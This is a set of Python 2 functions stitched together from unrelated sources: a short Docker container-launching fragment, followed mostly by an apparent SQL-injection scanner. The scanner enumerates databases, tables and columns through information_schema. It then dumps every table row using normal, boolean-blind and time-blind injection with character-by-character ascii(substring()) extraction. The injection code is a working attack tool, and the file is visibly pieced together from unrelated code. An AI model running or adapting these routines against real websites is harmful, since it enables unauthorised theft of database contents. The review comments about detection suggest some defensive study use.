        if '/' in p:
            p, proto = p.split('/')
        else:
            proto = 'tcp'
        if ':' in p:
            h_p, c_p = map(int, p.split(':'))
        else:
            h_p = c_p = int(p)
        if proto in ['tcp', 'both']:
            expose.append(c_p)
            bind[c_p] = (node.ip, h_p)
        if proto in ['udp', 'both']:
            expose.append( (c_p, 'udp') )
            bind['%s/udp'%c_p] = (node.ip, h_p)
        L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p))
    # Dynamic ports: "container[/proto]"; bound on node.ip with no host port
    # given in the binding tuple.
    for p in dynamic:
        if '/' in p:
            p, proto = p.split('/')
        else:
            proto = 'tcp'
        c_p = int(p)
        if proto in ['tcp', 'both']:
            expose.append(c_p)
            bind[c_p] = (node.ip, )
        if proto in ['udp', 'both']:
            expose.append( (c_p, 'udp') )
            bind['%s/udp'%c_p] = (node.ip, )
        L.info('Opening dynamic port on %s to %s'%(node.ip, c_p))
    # Remove a stopped container of the same name before starting a new one.
    node.cleanup_dead(name=container_name)
    if not node.is_running(name=container_name):
        build = s.get('build', None)
        # With a build entry the service name is used as the image name,
        # otherwise the configured image.
        image = build and s.get('service', '') or s.get('image', None)
        # NOTE(review): command and every environment entry are %-formatted
        # with the schedule dict, and volumes/network are passed through
        # unchanged; whoever can edit the service config decides what is
        # mounted and executed on the node.
        instance = node.run(
            name=container_name,
            hostname=container_name,
            image=image,
            build=build,
            ports=expose,
            command=s.get('command', '')%s,
            environment=[e%s for e in s.get('environment', [])],
            labels=labels,
            host_config = node.client.create_host_config(
                binds=s.get('volumes', None),
                port_bindings=bind,
                dns=[self.leader_ip],
                dns_search=[self.cfg.get('domain', None)],
                network_mode=s.get('network', None),
            )
        )
    else:
        L.debug("Already running %s"%(container_name))
def get_content(self, result, database_name, table_name, column_name, limits):
    # Reads one value (row offset `limits`, column `column_name`) from
    # database_name.table_name through the helper chosen by self.sqlimethod
    # and puts the tuple (column_name, value) on the `result` queue.
    # Nothing is put on the queue when sqlimethod matches none of the three
    # branches.
    # NOTE(review): nesting was reconstructed from a whitespace-collapsed
    # listing; confirm against the upstream file.

    # Start reading the content.
    content_len = 0
    logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))
    logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

    if self.sqlimethod == "normal":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)

        # Length of this row's value.
        logger.debug("Start %dth content length sqli..." % (limits + 1))
        content_len = normal_injection(select="length(`" + column_name + "`)",
                                       source=database_name + "." + table_name,
                                       limit=limits,
                                       dealpayload=self.dealpayload,
                                       data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                       )
        logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
        logger.info("[*] content_len: %d" % content_len)

        # Then the value itself.
        logger.debug("Start %dth content sqli..." % (limits + 1))
        content = normal_injection(select="`" + column_name + "`",
                                   source=database_name + "." + table_name,
                                   limit=limits,
                                   dealpayload=self.dealpayload,
                                   data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                   )
        logger.debug("Content sqli success...The content is %s..." % content)

        # Hand the value back as a tuple.
        contents = [column_name, content]
        logger.info("[*] content: %s" % content)
        result.put(tuple(contents))

    elif self.sqlimethod == "build":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)

        # Length of the value.
        retVal = build_injection(select="length(`" + column_name + "`)",
                                 source=database_name + "." + table_name,
                                 limit=limits,
                                 dealpayload=self.dealpayload, data=self.Data,
                                 lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
        content_len = int(retVal)
        logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
        logger.info("[*] content_len: %d" % content_len)

        # Then the value, one character per request.
        # Reset the accumulator.
        content = ""
        logger.debug("Start %dth content sqli..." % (limits + 1))
        for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
            retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                     source=database_name + "." + table_name,
                                     limit=limits,
                                     dealpayload=self.dealpayload, data=self.Data,
                                     lens=self.len, isStrings=True, sqlirequest=self.sqlirequest)
            content += chr(retVal)
        logger.debug("Content sqli success...The content is %s..." % content)

        # Hand the value back as a tuple.
        contents = [column_name, content]
        logger.info("[*] content: %s" % content)
        result.put(tuple(contents))

    elif self.sqlimethod == "time":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)

        # Length of the value.
        retVal = time_injection(select="length(`" + column_name + "`)",
                                source=database_name + "." + table_name,
                                limit=limits,
                                dealpayload=self.dealpayload, data=self.Data,
                                times=self.time, isCount=True, sqlirequest=self.sqlirequest)
        content_len = int(retVal)
        logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
        logger.info("[*] content_len: %d" % content_len)

        # Then the value, one character per request.
        # Reset the accumulator.
        content = ""
        logger.debug("Start %dth content sqli..." % (limits + 1))
        for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False):
            retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                    source=database_name + "." + table_name,
                                    limit=limits,
                                    dealpayload=self.dealpayload, data=self.Data,
                                    times=self.time, isStrings=True, sqlirequest=self.sqlirequest)
            content += chr(retVal)
        logger.debug("Content sqli success...The content is %s..." % content)

        # Hand the value back as a tuple.
        contents = [column_name, content]
        logger.info("[*] content: %s" % content)
        result.put(tuple(contents))

    logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def get_content_count(self, database_name, table_name):
    """Return the row count of ``database_name.table_name``.

    The count is obtained through the helper selected by ``self.sqlimethod``
    ("normal", "build" or "time"). Any other value returns ``None``.
    """
    logger.debug("Start sqli table %s content amount..." % table_name)
    logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

    if self.sqlimethod == "normal":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)
        # This helper's result is used as the count directly.
        content_count = normal_injection(
            select="count(*)",
            source=database_name + "." + table_name,
            dealpayload=self.dealpayload,
            data=self.Data,
            isCount=True,
            sqlirequest=self.sqlirequest,
        )
        logger.debug("Content account sqli success...The count is %d..." % content_count)
        logger.info("[*] content count: %d" % content_count)
        return content_count

    if self.sqlimethod == "build":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)
        raw_count = build_injection(
            select="count(*)",
            source=database_name + "." + table_name,
            dealpayload=self.dealpayload,
            data=self.Data,
            lens=self.len,
            isCount=True,
            sqlirequest=self.sqlirequest,
        )
        content_count = int(raw_count)
        logger.debug("Content account sqli success...The content_count is %d..." % content_count)
        logger.info("[*] content_count: %d" % content_count)
        logger.info("[*] content count: %d" % content_count)
        return content_count

    if self.sqlimethod == "time":
        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start table's %s content amount sqli..." % table_name)
        raw_count = time_injection(
            select="count(*)",
            source=database_name + "." + table_name,
            dealpayload=self.dealpayload,
            data=self.Data,
            times=self.time,
            isCount=True,
            sqlirequest=self.sqlirequest,
        )
        content_count = int(raw_count)
        logger.debug("Content account sqli success...The content_count is %d..." % content_count)
        logger.info("[*] content_count: %d" % content_count)
        logger.info("[*] content count: %d" % content_count)
        return content_count
def run_content(self):
    # Reads the rows of every table listed in self.columns_name and prints
    # them as one PrettyTable per table. Each row is fetched with one thread
    # per column; the threads report back through a queue.
    # NOTE(review): nesting was reconstructed from a whitespace-collapsed
    # listing; confirm against the upstream file.
    if len(self.columns_name) == 0:
        SqliColumns.get_columns(self)

    # Walk databases, then tables.
    for database_name in self.columns_name:
        for table_name in self.columns_name[database_name]:

            # Get the row count. Whenever it differs from self.content_count,
            # self.content_count is overwritten with it, so the row limit
            # follows the table's actual size both up and down.
            content_counts = self.get_content_count(database_name, table_name)
            if content_counts == 0:
                logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
                continue
            elif content_counts != self.content_count:
                logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts))
                self.content_count = content_counts
            else:
                pass

            # Table that collects the output; the headers are the column names.
            content = PrettyTable(list(self.columns_name[database_name][table_name]))
            content.padding_width = 1
            content.align = "r"

            # One pass per row.
            for limits in xrange(self.content_count):

                # Queue that receives the (column_name, value) tuples.
                result = Queue.Queue()

                # Thread list, collected results and the final row values.
                threads = []
                results = []
                contents = []

                # Start the per-column threads.
                logger.debug("Start multithreading Sqli...")
                for column_name in self.columns_name[database_name][table_name]:
                    # One thread per column.
                    try:
                        t = threading.Thread(target=self.get_content, name='thread for %s' % column_name,
                                             args=(result, database_name, table_name, column_name, limits))
                        t.start()
                    except:
                        # NOTE(review): the bare except also catches
                        # KeyboardInterrupt, and the append below then adds a
                        # thread from an earlier iteration (or raises
                        # NameError on the first one).
                        logger.error('Thread error...')
                    threads.append(t)

                # Wait for all threads.
                for t in threads:
                    t.join()

                # Drain the queue.
                while not result.empty():
                    results.append(result.get())

                # Order the values by column; a column whose thread returned
                # nothing leaves the row shorter than the header.
                for i in list(self.columns_name[database_name][table_name]):
                    for item in results:
                        if item[0] == i:
                            contents.append(item[1])
                        else:
                            continue

                # Add the row.
                content_str = ','.join(contents)
                logger.info("Sqli success content is %s" % content_str)
                content.add_row(contents)

            # Print the table.
            logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
            print "[*] Database %s Table %s content:" % (database_name, table_name)
            print content
def main():
    """Entry point: log the start of the scanner, then run ``oparser``."""
    start_message = "Begin Scanner..."
    logger.debug(start_message)
    oparser()
def get_columns(self):
    """Fill ``self.columns_name`` with the column names of every known table.

    For each database/table pair in ``self.tables_name`` the column count,
    each column-name length and each column name are read from
    ``information_schema.columns`` through the helper selected by
    ``self.sqlimethod`` (``"normal"``, ``"build"`` or ``"time"``). The result
    is stored as ``self.columns_name[database][table] = tuple(names)``, then
    logged and printed. Python 2 only (``print`` statement).

    If ``self.tables_name`` is empty, ``SqliTables.get_tables(self)`` is
    called first (presumably it fills ``self.tables_name`` - confirm).
    An unrecognised ``self.sqlimethod`` leaves every table with an empty tuple.

    NOTE(review): ``table_name`` and ``database_name`` are concatenated into
    the ``conditions`` string without quoting. For detection, every statement
    built here references ``information_schema.columns`` and wraps
    ``column_name`` in ``length()`` / ``ascii(substring(...))``; the "build"
    and "time" branches make one helper call per character position.
    """

    # If tables_name has not been populated, enumerate the tables first.
    if len(self.tables_name) == 0:
        SqliTables.get_tables(self)

    # Outer loop: every database name.
    for database_name in self.tables_name:

        # Each database gets its own dict (table -> columns).
        self.columns_name[database_name]={}

        # Columns are enumerated once per table.
        for table_name in self.tables_name[database_name]:

            # Column names of this table are collected in a list.
            columns_name = []

            # Start enumerating the columns.
            logger.debug("Start sqli databases %s's tables %s's columns..." % (database_name, table_name))
            logger.debug("The sqlirequest is %s, start sqli columns..." % self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)

                # First, the number of columns.
                columns_number = normal_injection(select='COUNT(*)', source="information_schema.columns",
                                                  conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                                  dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                  )

                logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                # One iteration per column (progress bar disabled).
                for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True):
                    # First, the length of the column name.
                    logger.debug("Start %dth column length sqli..." % (i + 1))
                    column_name_len = normal_injection(select='length(`column_name`)', source="information_schema.columns",
                                                       conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                                       dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                       )

                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then the column name itself, in a single helper call.
                    column_name = normal_injection(select='`column_name`', source='information_schema.columns',
                                                   conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                                   dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                                   )

                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append the name to the list.
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)

                retVal = build_injection(select="COUNT(`column_name`)", source="information_schema.columns",
                                         conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
                columns_number = int(retVal)

                logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                for i in range(0, int(columns_number)):
                    # Length of the i-th column name.
                    logger.debug("Start %dth column length sqli..." % (i + 1))

                    retVal = build_injection(select="length(`column_name`)", source="information_schema.columns",
                                             conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                             dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
                    column_name_len = int(retVal)

                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then the column name, one character at a time.
                    # Reset the accumulator.
                    column_name = ""

                    logger.debug("Start %dth column sqli..."
                                 % (i + 1))

                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        # substring() is 1-based, hence j + 1; the helper's
                        # result is fed to chr(), so presumably an int code.
                        retVal = build_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
                                                 source="information_schema.columns",
                                                 conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                                 dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)

                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append the name to the list.
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start table's %s column amount sqli..." % table_name)

                retVal = time_injection(select="COUNT(`column_name`)", source="information_schema.columns",
                                        conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest)
                columns_number = int(retVal)

                logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
                logger.info("[*] columns_number: %d" % columns_number)

                for i in range(0, int(columns_number)):
                    # Length of the i-th column name.
                    logger.debug("Start %dth column length sqli..." % (i + 1))

                    retVal = time_injection(select="length(`column_name`)", source="information_schema.columns",
                                            conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                            dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest)
                    column_name_len = int(retVal)

                    logger.debug("%dth Column name length sqli success...The column_name_len is %d..."
                                 % ((i + 1), column_name_len))
                    logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len))

                    # Then the column name, one character at a time.
                    # Reset the accumulator.
                    column_name = ""

                    logger.debug("Start %dth column sqli..." % (i + 1))

                    for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False):
                        retVal = time_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))",
                                                source="information_schema.columns",
                                                conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i,
                                                dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest)
                        column_name += chr(retVal)

                    logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name))

                    # Append the name to the list.
                    columns_name.append(column_name)
                    logger.info("[*] %dth column_name: %s" % ((i + 1), column_name))

            # Store the collected names as a tuple.
            self.columns_name[database_name][table_name] = tuple(columns_name)

    logger.info("Sqli result:")

    # Log all column names; `columns_name` is reused here as a string.
    for database_name in self.columns_name:
        tables_name = ""
        for table_name in self.columns_name[database_name]:
            tables_name += table_name
            tables_name += ','
            columns_name = ""
            for column_name in self.columns_name[database_name][table_name]:
                columns_name += column_name
                columns_name += ','

            logger.info("Table %s has columns %s", table_name, columns_name)
        logger.info("Database %s has tables %s", database_name, tables_name)

    print "[*]Columns list:", self.columns_name
def get_database(self):
    """Append the server's schema names to ``self.databases_name`` and print them.

    The schema count, each name length and each name are read from
    ``information_schema.SCHEMATA`` through the helper selected by
    ``self.sqlimethod`` (``"normal"``, ``"build"`` or ``"time"``). The name
    ``information_schema`` itself is not stored. An unrecognised
    ``self.sqlimethod`` reads nothing and only prints the current list.
    Python 2 only (``print`` statement).

    NOTE(review): for detection, every statement built here references
    ``information_schema.SCHEMATA`` and wraps ``SCHEMA_NAME`` in ``COUNT()``,
    ``length()`` or ``ascii(substring(...))``; the "build" and "time" branches
    make one helper call per character position.
    """

    logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)

    if self.sqlimethod == "normal":

        logger.debug("The sqlimethod is %s..." % self.sqlimethod)
        logger.debug("Start database amount sqli...")

        # First, the number of databases.
        databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)', source='information_schema.SCHEMATA',
                                            dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                            )

        logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
        print "[*] databases_number: %d" % databases_number

        # One iteration per database (progress bar disabled).
        for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True):
            # First, the length of the database name.
            logger.debug("Start %dth database length sqli..." % (i + 1))
            databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)', source='information_schema.SCHEMATA',
                                                  limit=i,
                                                  dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest
                                                  )
            logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
            logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

            # Then the database name itself, in a single helper call.
            logger.debug("Start %dth database name sqli..." % (i + 1))
            databases_name = normal_injection(select='`SCHEMA_NAME`', source='information_schema.SCHEMATA', limit=i,
                                              dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                              )
            logger.debug(
                "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

            # Keep every schema except information_schema itself.
            if databases_name != "information_schema":
                self.databases_name.append(databases_name)
                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

    elif self.sqlimethod == "build":

        logger.debug("The sqlimethod is %s..."
                     % self.sqlimethod)
        logger.debug("Start database amount sqli...")

        retVal = build_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA",
                                 dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
        databases_number = int(retVal)

        logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
        logger.info("[*] databases_number: %d" % databases_number)

        for i in range(0, int(databases_number)):
            logger.debug("Start %dth database length sqli..." % (i + 1))

            # Length of the i-th database name.
            retVal = build_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i,
                                     dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest)
            databases_name_len = int(retVal)

            logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
            logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

            # Then the database name, one character at a time.
            # Reset the accumulator.
            databases_name = ""

            logger.debug("Start %dth database sqli..." % (i + 1))

            for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
                # substring() is 1-based, hence j + 1; the helper's result is
                # fed to chr(), so presumably an int character code.
                retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                         source="information_schema.SCHEMATA", limit=i,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest)
                databases_name += chr(retVal)

            logger.debug(
                "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

            # Keep every schema except information_schema itself.
            if databases_name != "information_schema":
                self.databases_name.append(databases_name)
                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

    elif self.sqlimethod == "time":

        logger.debug("The sqlimethod is %s..."
                     % self.sqlimethod)
        logger.debug("Start database amount sqli...")

        retVal = time_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA",
                                dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest)
        databases_number = int(retVal)

        logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
        logger.info("[*] databases_number: %d" % databases_number)

        for i in range(0, int(databases_number)):
            logger.debug("Start %dth database length sqli..." % (i + 1))

            # Length of the i-th database name.
            retVal = time_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest)
            databases_name_len = int(retVal)

            logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
            logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))

            # Then the database name, one character at a time.
            # Reset the accumulator.
            databases_name = ""

            logger.debug("Start %dth database sqli..." % (i + 1))

            for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
                retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
                                        source="information_schema.SCHEMATA", limit=i,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest)
                databases_name += chr(retVal)

            logger.debug(
                "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))

            # Keep every schema except information_schema itself.
            if databases_name != "information_schema":
                self.databases_name.append(databases_name)
                logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))

    # The local name is rebound here to the comma-joined list for printing.
    databases_name = ','.join(self.databases_name)

    print "[*] databases_name list: " + databases_name
def print_log(log):
    """Send *log*, with a newline appended, to the module logger at DEBUG level.

    *log* must support ``+`` with a ``str``; it is not otherwise checked.
    NOTE(review): if callers pass text from an untrusted source, embedded
    CR/LF characters can forge extra log lines - confirm at the call sites.
    """
    message = log + '\n'
    logger.debug(message)